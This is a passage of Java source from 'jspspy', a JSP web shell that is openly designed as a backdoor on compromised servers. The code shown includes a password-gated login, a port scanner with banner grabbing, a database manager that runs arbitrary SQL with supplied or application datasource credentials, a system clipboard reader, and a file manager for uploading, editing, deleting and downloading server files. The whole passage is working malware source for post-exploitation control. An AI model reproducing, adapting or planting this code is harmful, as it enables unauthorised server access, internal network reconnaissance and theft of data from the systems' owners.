1095. + " Files Deleted <span style='color:green'>Success</span> , "
1096. + failed
1097. + " Files Deleted <span style='color:red'>Failed</span>!");
1098. response.sendRedirect(SHELL_NAME);
1099. } catch (Exception e) {
1100.  
1101. throw e;
1102. }
1103. }
1104. }
1105.  
1106. private static class ClipBoardInvoker extends DefaultInvoker {
1107. public void invoke(HttpServletRequest request,
1108. HttpServletResponse response, HttpSession JSession)
1109. throws Exception {
1110. try {
1111. PrintWriter out = response.getWriter();
1112. out
1113. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"
1114. + " <tr>"
1115. + " <td>"
1116. + " <h2>System Clipboard &raquo;</h2>"
1117. + "<p><pre>");
1118. try {
1119. out.println(Util.htmlEncode(Util.getStr(Toolkit
1120. .getDefaultToolkit().getSystemClipboard()
1121. .getContents(DataFlavor.stringFlavor)
1122. .getTransferData(DataFlavor.stringFlavor))));
1123. } catch (Exception ex) {
1124. out.println("ClipBoard is Empty Or Is Not Text Data !");
1125. }
1126. out
1127. .println("</pre>"
1128. + " <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />"
1129. + " </p>" + " </td>" + " </tr>"
1130. + "</table>");
1131. } catch (Exception e) {
1132.  
1133. throw e;
1134. }
1135. }
1136. }
1137.  
1138. private static class VPortScanInvoker extends DefaultInvoker {
1139. public void invoke(HttpServletRequest request,
1140. HttpServletResponse response, HttpSession JSession)
1141. throws Exception {
1142. try {
1143. PrintWriter out = response.getWriter();
1144. String ip = request.getParameter("ip");
1145. String ports = request.getParameter("ports");
1146. String timeout = request.getParameter("timeout");
1147. String banner = request.getParameter("banner");
1148. if (Util.isEmpty(ip))
1149. ip = "127.0.0.1";
1150. if (Util.isEmpty(ports))
1151. ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
1152. if (Util.isEmpty(timeout))
1153. timeout = "2";
1154. out
1155. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1156. + "<h2 id=\"Bin_H2_Title\">PortScan &gt;&gt;</h2>"
1157. + "<div id=\"YwLB\"><form action=\""
1158. + SHELL_NAME
1159. + "\" method=\"post\">"
1160. + "<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"
1161. + "IP : <input name=\"ip\" type=\"text\" value=\""
1162. + ip
1163. + "\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""
1164. + ports
1165. + "\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> <input "
1166. + (!Util.isEmpty(banner) ? "checked" : "")
1167. + " type='checkbox' value='yes' name='banner'/>Banner Timeout (Second) : <input name=\"timeout\" type=\"text\" value=\""
1168. + timeout
1169. + "\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"
1170. + "</p>"
1171. + "</form></div>"
1172. + "</td></tr></table>");
1173. } catch (Exception e) {
1174.  
1175. throw e;
1176. }
1177. }
1178. }
1179.  
1180. private static class PortScanInvoker extends DefaultInvoker {
1181. public void invoke(HttpServletRequest request,
1182. HttpServletResponse response, HttpSession JSession)
1183. throws Exception {
1184. try {
1185. PrintWriter out = response.getWriter();
1186. ((Invoker) ins.get("vPortScan")).invoke(request, response,
1187. JSession);
1188. out.println("<hr/>");
1189. String ip = request.getParameter("ip");
1190. String ports = request.getParameter("ports");
1191. String timeout = request.getParameter("timeout");
1192. String banner = request.getParameter("banner");
1193. int iTimeout = 0;
1194. if (Util.isEmpty(ip) || Util.isEmpty(ports))
1195. return;
1196. if (!Util.isInteger(timeout)) {
1197. timeout = "2";
1198. }
1199. iTimeout = Integer.parseInt(timeout);
1200. Map rs = new LinkedHashMap();
1201. String[] portArr = ports.split(",");
1202. for (int i = 0; i < portArr.length; i++) {
1203. String port = portArr[i];
1204. BufferedReader r = null;
1205. try {
1206. Socket s = new Socket();
1207. s.connect(new InetSocketAddress(ip, Integer
1208. .parseInt(port)), iTimeout);
1209. s.setSoTimeout(iTimeout);
1210. if (!Util.isEmpty(banner)) {
1211. r = new BufferedReader(new InputStreamReader(s
1212. .getInputStream()));
1213. StringBuffer sb = new StringBuffer();
1214. String b = r.readLine();
1215. while (b != null) {
1216. sb.append(b + " ");
1217. try {
1218. b = r.readLine();
1219. } catch (Exception e) {
1220. break;
1221. }
1222. }
1223. rs.put(port,
1224. "Open <span style=\"color:grey;font-weight:normal\">"
1225. + sb.toString() + "</span>");
1226. r.close();
1227. } else {
1228. rs.put(port, "Open");
1229. }
1230. s.close();
1231. } catch (Exception e) {
1232. if (e.toString().toLowerCase()
1233. .indexOf("read timed out") != -1) {
1234. rs
1235. .put(
1236. port,
1237. "Open <span style=\"color:grey;font-weight:normal\">&lt;&lt;No Banner!&gt;&gt;</span>");
1238. if (r != null)
1239. r.close();
1240. } else {
1241. rs.put(port, "Close");
1242. }
1243. }
1244. }
1245. out.println("<div style='margin:10px'>");
1246. Set entrySet = rs.entrySet();
1247. Iterator it = entrySet.iterator();
1248. while (it.hasNext()) {
1249. Map.Entry e = (Map.Entry) it.next();
1250. String port = (String) e.getKey();
1251. String value = (String) e.getValue();
1252. out.println(ip + " : " + port
1253. + " ................................. <font color="
1254. + (value.equals("Close") ? "red" : "green")
1255. + "><b>" + value + "</b></font><br>");
1256. }
1257. out.println("</div>");
1258. } catch (Exception e) {
1259.  
1260. throw e;
1261. }
1262. }
1263. }
1264.  
1265. private static class VConnInvoker extends DefaultInvoker {
1266. public void invoke(HttpServletRequest request,
1267. HttpServletResponse response, HttpSession JSession)
1268. throws Exception {
1269. try {
1270. PrintWriter out = response.getWriter();
1271. Object obj = JSession.getAttribute(DBO);
1272. if (obj == null || !((DBOperator) obj).isValid()) {
1273. out
1274. .println(" <script type=\"text/javascript\">"
1275. + " function changeurldriver(){"
1276. + " var form = document.forms[\"form1\"];"
1277. + " var v = form.elements[\"db\"].value;"
1278. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1279. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1280. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1281. + " }" + " </script>");
1282. out
1283. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1284. + "<form name=\"form1\" id=\"form1\" action=\""
1285. + SHELL_NAME
1286. + "\" method=\"post\" >"
1287. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">"
1288. + "<h2>DataBase Manager &raquo;</h2>"
1289. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1290. + "<p>"
1291. + "DataSource:"
1292. + " <input class=\"input\" name=\"dataSource\" id=\"dataSource\" type=\"text\" style=\"width:80px;\" />"
1293. + "Driver:"
1294. + " <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />"
1295. + "URL:"
1296. + "<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1297. + "UID:"
1298. + "<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1299. + "PWD:"
1300. + "<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1301. + "DataBase:"
1302. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1303. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1304. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1305. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1306. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>"
1307. + " <option value=' ` '>Other</option>"
1308. + " </select>"
1309. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1310. + "</p>"
1311. + "</form></table><script>changeurldriver()</script>");
1312. } else {
1313. ((Invoker) ins.get("dbc")).invoke(request, response,
1314. JSession);
1315. }
1316. } catch (ClassCastException e) {
1317. throw e;
1318. } catch (Exception e) {
1319.  
1320. throw e;
1321. }
1322. }
1323. }
1324.  
1325. //DBConnect
1326. private static class DbcInvoker extends DefaultInvoker {
1327. public void invoke(HttpServletRequest request,
1328. HttpServletResponse response, HttpSession JSession)
1329. throws Exception {
1330. try {
1331. PrintWriter out = response.getWriter();
1332. String driver = request.getParameter("driver");
1333. String url = request.getParameter("url");
1334. String uid = request.getParameter("uid");
1335. String pwd = request.getParameter("pwd");
1336. String sql = request.getParameter("sql");
1337. String dataSource = request.getParameter("dataSource");
1338. String selectDb = request.getParameter("selectDb");
1339. if (selectDb == null)
1340. selectDb = JSession.getAttribute("selectDb").toString();
1341. else
1342. JSession.setAttribute("selectDb", selectDb);
1343. Object dbo = JSession.getAttribute(DBO);
1344. if (dbo == null || !((DBOperator) dbo).isValid()) {
1345. if (dbo != null)
1346. ((DBOperator) dbo).close();
1347. if(!Util.isEmpty(dataSource)){
1348. WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext());
1349. DataSource dsObj = (DataSource) appContext.getBean(dataSource);
1350. dbo = new DBOperator(dsObj,dataSource,true);
1351. }else{
1352. dbo = new DBOperator(driver,url,uid,pwd,true);
1353. }
1354. } else {
1355. if (!Util.isEmpty(dataSource) || (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid))) {
1356. DBOperator oldDbo = (DBOperator)dbo;
1357. if(!Util.isEmpty(dataSource)){
1358. WebApplicationContext appContext = WebApplicationContextUtils.getWebApplicationContext(JSession.getServletContext());
1359. DataSource dsObj = (DataSource) appContext.getBean(dataSource);
1360. dbo = new DBOperator(dsObj,dataSource,false);
1361. }else{
1362. dbo = new DBOperator(driver,url,uid,pwd);
1363. }
1364. if (!oldDbo.equals(dbo)) {
1365. ((DBOperator)oldDbo).close();
1366. ((DBOperator)dbo).connect();
1367. } else {
1368. dbo = oldDbo;
1369. }
1370. }
1371. }
1372. DBOperator Ddbo = (DBOperator) dbo;
1373. JSession.setAttribute(DBO, Ddbo);
1374. if (!Util.isEmpty(request.getParameter("type"))
1375. && request.getParameter("type").equals("switch")) {
1376. Ddbo.getConn().setCatalog(request.getParameter("catalog"));
1377. }
1378. Util.outMsg(out, "Connect To DataBase Success!");
1379. out
1380. .println(" <script type=\"text/javascript\">"
1381. + " function changeurldriver(selectDb){"
1382. + " var form = document.forms[\"form1\"];"
1383. + " if (selectDb){"
1384. + " form.elements[\"db\"].selectedIndex = selectDb"
1385. + " }"
1386. + " var v = form.elements[\"db\"].value;"
1387. + " form.elements[\"url\"].value = v.split(\"`\")[1];"
1388. + " form.elements[\"driver\"].value = v.split(\"`\")[0];"
1389. + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;"
1390. + " }" + " </script>");
1391. out
1392. .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"
1393. + "<form name=\"form1\" id=\"form1\" action=\""
1394. + SHELL_NAME
1395. + "\" method=\"post\" >"
1396. + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\""
1397. + selectDb
1398. + "\">"
1399. + "<h2>DataBase Manager &raquo;</h2>"
1400. + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />"
1401. + "<p>"
1402. + "DataSource:"
1403. + " <input class=\"input\" name=\"dataSource\" value=\""+((Ddbo.dsStr==null)?"":Ddbo.dsStr)+"\" id=\"dataSource\" type=\"text\" style=\"width:80px;\" />"
1404. + "Driver:"
1405. + " <input class=\"input\" name=\"driver\" value=\""
1406. + Ddbo.driver
1407. + "\" id=\"driver\" type=\"text\" size=\"35\" />"
1408. + "URL:"
1409. + "<input class=\"input\" name=\"url\" value=\""
1410. + Ddbo.url
1411. + "\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />"
1412. + "UID:"
1413. + "<input class=\"input\" name=\"uid\" value=\""
1414. + Ddbo.uid
1415. + "\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />"
1416. + "PWD:"
1417. + "<input class=\"input\" name=\"pwd\" value=\""
1418. + Ddbo.pwd
1419. + "\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />"
1420. + "DataBase:"
1421. + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >"
1422. + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>"
1423. + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>"
1424. + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>"
1425. + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:/ninty.mdb'>Access</option>"
1426. + " <option value=' ` '>Other</option>"
1427. + " </select>"
1428. + "<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"Connect\" type=\"submit\" size=\"100\" />"
1429. + "</p>"
1430. + "</form><script>changeurldriver('"
1431. + selectDb + "')</script>");
1432. DatabaseMetaData meta = Ddbo.getConn().getMetaData();
1433. out
1434. .println("<form action=\""
1435. + SHELL_NAME
1436. + "\" method=\"POST\">"
1437. + "<p><input type=\"hidden\" name=\"selectDb\" value=\""
1438. + selectDb
1439. + "\"><input type=\"hidden\" name=\"o\" value=\"executesql\"><table width=\"200\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td colspan=\"2\">Version : <b style='color:red;font-size:14px'><i>"
1440. + meta.getDatabaseProductName()
1441. + " , "
1442. + meta.getDatabaseProductVersion()
1443. + "</i></b><br/>URL : <b style='color:red;font-size:14px'><i>"
1444. + meta.getURL()
1445. + "</i></b><br/>Catalog : <b style='color:red;font-size:14px'><i>"
1446. + Ddbo.getConn().getCatalog()
1447. + "</i></b><br/>UserName : <b style='color:red;font-size:14px'><i>"
1448. + meta.getUserName()
1449. + "</i></b><br/><br/></td></tr><tr><td colspan=\"2\">Run SQL query/queries on database / <b><i>Switch Database :</i></b> ");
1450. out
1451. .println("<select id=\"catalogs\" onchange=\"if (this.value == '0') return;doPost({o:'executesql',type:'switch',catalog:document.getElementById('catalogs').value})\">");
1452. out
1453. .println("<option value='0'>-- Select a DataBase --</option>");
1454. ResultSet dbs = meta.getCatalogs();
1455. try {
1456. while (dbs.next()) {
1457. out.println("<option value='" + dbs.getString(1) + "'>"
1458. + dbs.getString(1) + "</option>");
1459. }
1460. } catch (Exception ex) {
1461. }
1462. dbs.close();
1463. out
1464. .println("</select></td></tr><tr><td><textarea id=\"sql\" name=\"sql\" class=\"area\" style=\"width:600px;height:50px;overflow:auto;\">"
1465. + Util.htmlEncode(Util.getStr(sql))
1466. + "</textarea><input class=\"bt\" name=\"submit\" type=\"submit\" value=\"Query\" /> <input class=\"bt\" onclick=\"doPost({o:'export',type:'queryexp',sql:document.getElementById('sql').value})\" type=\"button\" value=\"Export\" /> <input type='button' value='Export To File' class='bt' onclick=\"doPost({o:'vExport',type:'queryexp',sql:document.getElementById('sql').value})\"></td><td nowrap style=\"padding:0 5px;\"></td></tr></table></p></form></table>");
1467. if (Util.isEmpty(sql)) {
1468. String type = request.getParameter("type");
1469. if (Util.isEmpty(type) || type.equals("switch")) {
1470. ResultSet tbs = meta.getTables(null, null, null, null);
1471. out.println(Table.rs2Table(tbs, meta
1472. .getIdentifierQuoteString(), true));
1473. tbs.close();
1474. } else if (type.equals("struct")) {
1475. String tb = request.getParameter("table");
1476. if (Util.isEmpty(tb))
1477. return;
1478. ResultSet t = meta.getColumns(null, null, tb, null);
1479. out.println(Table.rs2Table(t, "", false));
1480. t.close();
1481. }
1482. }
1483. } catch (Exception e) {
1484. JSession
1485. .setAttribute(
1486. MSG,
1487. "<span style='color:red'>Some Error Occurred. Please Check Out the StackTrace Follow.</span>"
1488. + BACK_HREF);
1489. throw e;
1490. }
1491. }
1492. }
1493.  
1494. private static class ExecuteSQLInvoker extends DefaultInvoker {
1495. public void invoke(HttpServletRequest request,
1496. HttpServletResponse response, HttpSession JSession)
1497. throws Exception {
1498. try {
1499. PrintWriter out = response.getWriter();
1500. String sql = request.getParameter("sql");
1501. String db = request.getParameter("selectDb");
1502. Object dbo = JSession.getAttribute(DBO);
1503. if (!Util.isEmpty(sql)) {
1504. if (dbo == null || !((DBOperator) dbo).isValid()) {
1505. ((Invoker) ins.get("vConn")).invoke(request, response,
1506. JSession);
1507. return;
1508. } else {
1509. ((Invoker) ins.get("dbc")).invoke(request, response,
1510. JSession);
1511. Object obj = ((DBOperator) dbo).execute(sql);
1512. if (obj instanceof ResultSet) {
1513. ResultSet rs = (ResultSet) obj;
1514. ResultSetMetaData meta = rs.getMetaData();
1515. int colCount = meta.getColumnCount();
1516. out
1517. .println("<b style=\"margin-left:15px\">Query#0 : "
1518. + Util.htmlEncode(sql)
1519. + "</b><br/><br/>");
1520. out
1521. .println("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
1522. for (int i = 1; i <= colCount; i++) {
1523. out.println("<td nowrap>"
1524. + meta.getColumnName(i) + "<br><span>"
1525. + meta.getColumnTypeName(i)
1526. + "</span></td>");
1527. }
1528. out.println("</tr>");
1529. Table tb = new Table();
1530. while (rs.next()) {
1531. Row r = new Row();
1532. for (int i = 1; i <= colCount; i++) {
1533. String v = null;
1534. try {
1535. v = rs.getString(i);
1536. } catch (SQLException ex) {
1537. v = "<<Error!>>";
1538. }
1539. r.addColumn(new Column(v));
1540. }
1541. tb.addRow(r);
1542. }
1543. out.println(tb.toString());
1544. out.println("</table><br/>");
1545. rs.close();
1546. ((DBOperator) dbo).closeStmt();
1547. } else {
1548. out
1549. .println("<b style='margin-left:15px'>affected rows : <i>"
1550. + obj + "</i></b><br/><br/>");
1551. }
1552. }
1553. } else {
1554. ((Invoker) ins.get("dbc")).invoke(request, response,
1555. JSession);
1556. }
1557. } catch (Exception e) {
1558.  
1559. throw e;
1560. }
1561. }
1562. }
1563.  
1564. private static class VLoginInvoker extends DefaultInvoker {
1565. public boolean doBefore() {
1566. return false;
1567. }
1568.  
1569. public void invoke(HttpServletRequest request,
1570. HttpServletResponse response, HttpSession JSession)
1571. throws Exception {
1572. try {
1573. PrintWriter out = response.getWriter();
1574. out
1575. .println("<html><head><title>jspspy</title><style type=\"text/css\">"
1576. + " input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}"
1577. + "a{font:11px Verdana;BACKGROUND: #FFFFFF;}"
1578. + " </style></head><body><form method=\"POST\" action=\""
1579. + SHELL_NAME
1580. + "\">"
1581. + "<!--<p style=\"font:11px Verdana;color:red\">Private Edition Dont Share It !</p>-->"
1582. + " <p><span style=\"font:11px Verdana;\">Password: </span>"
1583. + " <input name=\"o\" type=\"hidden\" value=\"login\">"
1584. + " <input name=\"pw\" type=\"password\" size=\"20\">"
1585. + " <input type=\"hidden\" name=\"o\" value=\"login\">"
1586. + " <input type=\"submit\" value=\"Login\"><br/>"
1587. + "<!--<span style=\"font:11px Verdana;\">Copyright &copy; 2010</span>--></p>"
1588. + " </form><span style='font-weight:bold;color:red;font-size:12px'></span></body></html>");
1589. } catch (Exception e) {
1590.  
1591. throw e;
1592. }
1593. }
1594. }
1595.  
1596. private static class LoginInvoker extends DefaultInvoker {
1597. public boolean doBefore() {
1598. return false;
1599. }
1600.  
1601. public void invoke(HttpServletRequest request,
1602. HttpServletResponse response, HttpSession JSession)
1603. throws Exception {
1604. try {
1605. String inputPw = request.getParameter("pw");
1606. if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
1607. ((Invoker) ins.get("vLogin")).invoke(request, response,
1608. JSession);
1609. return;
1610. } else {
1611. JSession.setAttribute(PW_SESSION_ATTRIBUTE, inputPw);
1612. response.sendRedirect(SHELL_NAME);
1613. return;
1614. }
1615. } catch (Exception e) {
1616.  
1617. throw e;
1618. }
1619. }
1620. }
1621.  
1622. private static class MyComparator implements Comparator {
1623. public int compare(Object obj1, Object obj2) {
1624. try {
1625. if (obj1 != null && obj2 != null) {
1626. File f1 = (File) obj1;
1627. File f2 = (File) obj2;
1628. if (f1.isDirectory()) {
1629. if (f2.isDirectory()) {
1630. return f1.getName().compareTo(f2.getName());
1631. } else {
1632. return -1;
1633. }
1634. } else {
1635. if (f2.isDirectory()) {
1636. return 1;
1637. } else {
1638. return f1.getName().toLowerCase().compareTo(
1639. f2.getName().toLowerCase());
1640. }
1641. }
1642. }
1643. return 0;
1644. } catch (Exception e) {
1645. return 0;
1646. }
1647. }
1648. }
1649.  
1650. private static class FileListInvoker extends DefaultInvoker {
1651. public void invoke(HttpServletRequest request,
1652. HttpServletResponse response, HttpSession JSession)
1653. throws Exception {
1654. try {
1655. String path2View = null;
1656. PrintWriter out = response.getWriter();
1657. String path = request.getParameter("folder");
1658. String outEntry = request.getParameter("outentry");
1659. if (!Util.isEmpty(outEntry) && outEntry.equals("true")) {
1660. JSession.removeAttribute(ENTER);
1661. JSession.removeAttribute(ENTER_MSG);
1662. JSession.removeAttribute(ENTER_CURRENT_DIR);
1663. }
1664. Object enter = JSession.getAttribute(ENTER);
1665. File file = null;
1666. if (!Util.isEmpty(enter)) {
1667. if (Util.isEmpty(path)) {
1668. if (JSession.getAttribute(ENTER_CURRENT_DIR) == null)
1669. path = "/";
1670. else
1671. path = (String) (JSession
1672. .getAttribute(ENTER_CURRENT_DIR));
1673. }
1674. file = new EnterFile(path);
1675. ((EnterFile) file).setZf((String) enter);
1676. JSession.setAttribute(ENTER_CURRENT_DIR, path);
1677. } else {
1678. if (Util.isEmpty(path))
1679. path = JSession.getAttribute(CURRENT_DIR).toString();
1680. JSession.setAttribute(CURRENT_DIR, Util.convertPath(path));
1681. file = new File(path);
1682. }
1683. path2View = Util.convertPath(path);
1684. if (!file.exists()) {
1685. throw new Exception(path + "Dont Exists !");
1686. }
1687. File[] list = file.listFiles();
1688. Arrays.sort(list, new MyComparator());
1689. out.println("<div style='margin:10px'>");
1690. String cr = null;
1691. try {
1692. cr = JSession.getAttribute(CURRENT_DIR).toString()
1693. .substring(0, 3);
1694. } catch (Exception e) {
1695. cr = "/";
1696. }
1697. File currentRoot = new File(cr);
1698. out.println("<h2>File Manager - Current disk &quot;"
1699. + (cr.indexOf("/") == 0 ? "/" : currentRoot.getPath())
1700. + "&quot; total (unknow)</h2>");
1701. out
1702. .println("<form action=\""
1703. + SHELL_NAME
1704. + "\" method=\"post\">"
1705. + "<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"
1706. + " <tr>"
1707. + " <td nowrap>Current Directory <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"
1708. + " <td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""
1709. + path2View
1710. + "\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"
1711. + " <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"
1712. + " </tr>" + "</table>" + "</form>");
1713. out
1714. .println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"
1715. + "<form action=\""
1716. + SHELL_NAME
1717. + "?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"
1718. + "<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" "
1719. + (enter == null ? "type=\"submit\""
1720. : "type=\"button\" onclick=\"alert('You Are In File Now ! Can Not Upload !')\"")
1721. + " /></div>"
1722. + "<a href=\"javascript:new fso({path:'"
1723. + Util.convertPath(WEB_ROOT)
1724. + "'}).subdir('true')\">Web Root</a>"
1725. + " | <a href=\"javascript:new fso({path:'"
1726. + Util.convertPath(SHELL_DIR)
1727. + "'}).subdir('true')\">Shell Directory</a>"
1728. + " | <a href=\"javascript:"
1729. + (enter == null ? "new fso({}).mkdir()"
1730. : "alert('You Are In File Now ! Can Not Create Directory ! ')")
1731. + "\">New Directory</a> | <a href=\"javascript:"
1732. + (enter == null ? "new fso({}).createFile()"
1733. : "alert('You Are In File Now ! Can Not Create File !')")
1734. + "\">New File</a>" + " | ");
1735. File[] roots = file.listRoots();
1736. for (int i = 0; i < roots.length; i++) {
1737. File r = roots[i];
1738. out.println("<a href=\"javascript:new fso({path:'"
1739. + Util.convertPath(r.getPath())
1740. + "'}).subdir('true');\">Disk("
1741. + Util.convertPath(r.getPath()) + ")</a>");
1742. if (i != roots.length - 1) {
1743. out.println("|");
1744. }
1745. }
1746. out.println("</td>" + "</tr></form>"
1747. + "<tr class=\"head\"><td>&nbsp;</td>"
1748. + " <td>Name</td>"
1749. + " <td width=\"16%\">Last Modified</td>"
1750. + " <td width=\"10%\">Size</td>"
1751. + " <td width=\"20%\">Read/Write/Execute</td>"
1752. + " <td width=\"22%\">&nbsp;</td>" + "</tr>");
1753. if (file.getParent() != null) {
1754. out
1755. .println("<tr class=alt1>"
1756. + "<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"
1757. + "<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"
1758. + Util.convertPath(file.getAbsolutePath())
1759. + "'}).parent()\">Goto Parent</a></td>"
1760. + "</tr>");
1761. }
1762. int dircount = 0;
1763. int filecount = 0;
1764. for (int i = 0; i < list.length; i++) {
1765. File f = list[i];
1766. if (f.isDirectory()) {
1767. dircount++;
1768. out
1769. .println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"
1770. + "<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"
1771. + "<td><a href=\"javascript:new fso({path:'"
1772. + Util.convertPath(f.getAbsolutePath())
1773. + "'}).subdir()\">"
1774. + f.getName()
1775. + "</a></td>"
1776. + "<td nowrap>"
1777. + Util.formatDate(f.lastModified())
1778. + "</td>"
1779. + "<td nowrap>--</td>"
1780. + "<td nowrap>"
1781. + f.canRead()
1782. + " / "
1783. + f.canWrite()
1784. + " / unknow</td>"
1785. + "<td nowrap>");
1786. if (enter != null)
1787. out.println("&nbsp;");
1788. else
1789. out
1790. .println("<a href=\"javascript:new fso({path:'"
1791. + Util.convertPath(f
1792. .getAbsolutePath())
1793. + "',filename:'"
1794. + f.getName()
1795. + "'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"
1796. + Util.convertPath(f
1797. .getAbsolutePath())
1798. + "'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"
1799. + Util.convertPath(f
1800. .getAbsolutePath())
1801. + "',filename:'"
1802. + f.getName()
1803. + "'}).pack(true)\">Pack</a>");
1804. out.println("</td></tr>");
1805. } else {
1806. filecount++;
1807. out
1808. .println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"
1809. + "<td width=\"2%\" nowrap><input type='checkbox' value='"
1810. + f.getName()
1811. + "'/></td>"
1812. + "<td><a href=\"javascript:new fso({path:'"
1813. + Util.convertPath(f.getAbsolutePath())
1814. + "'}).down()\">"
1815. + f.getName()
1816. + "</a></td>"
1817. + "<td nowrap>"
1818. + Util.formatDate(f.lastModified())
1819. + "</td>"
1820. + "<td nowrap>"
1821. + Util.getSize(f.length(), 'B')
1822. + "</td>"
1823. + "<td nowrap>"
1824. + ""
1825. + f.canRead()
1826. + " / "
1827. + f.canWrite()
1828. + " / unknow </td>"
1829. + "<td nowrap>"
1830. + "<a href=\"javascript:new fso({path:'"
1831. + Util.convertPath(f.getAbsolutePath())
1832. + "'}).vEdit()\">Edit</a> | "
1833. + "<a href=\"javascript:new fso({path:'"
1834. + Util.convertPath(f.getAbsolutePath())
1835. + "'}).down()\">Down</a> | "
1836. + "<a href=\"javascript:new fso({path:'"
1837. + Util.convertPath(f.getAbsolutePath())
1838. + "'}).copy()\">Copy</a>");
1839. if (enter == null) {
1840. out
1841. .println(" | <a href=\"javascript:new fso({path:'"
1842. + Util.convertPath(f
1843. .getAbsolutePath())
1844. + "'}).move()\">Move</a> | "
1845. + "<a href=\"javascript:new fso({path:'"
1846. + Util.convertPath(f
1847. .getAbsolutePath())
1848. + "'}).vEditProperty()\">Property</a> | "
1849. + "<a href=\"javascript:new fso({path:'"
1850. + Util.convertPath(f
1851. .getAbsolutePath())
1852. + "'}).enter()\">Enter</a>");
1853. if (f.getName().endsWith(".zip")
1854. || f.getName().endsWith(".jar")) {
1855. out
1856. .println(" | <a href=\"javascript:new fso({path:'"
1857. + Util.convertPath(f
1858. .getAbsolutePath())
1859. + "',filename:'"
1860. + f.getName()
1861. + "'}).unpack()\">UnPack</a>");
1862. } else if (f.getName().endsWith(".rar")) {
1863. out
1864. .println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
1865. } else {
1866. out
1867. .println(" | <a href=\"javascript:new fso({path:'"
1868. + Util.convertPath(f
1869. .getAbsolutePath())
1870. + "',filename:'"
1871. + f.getName()
1872. + "'}).pack()\">Pack</a>");
1873. }
1874. }
1875. out.println("</td></tr>");
1876. }
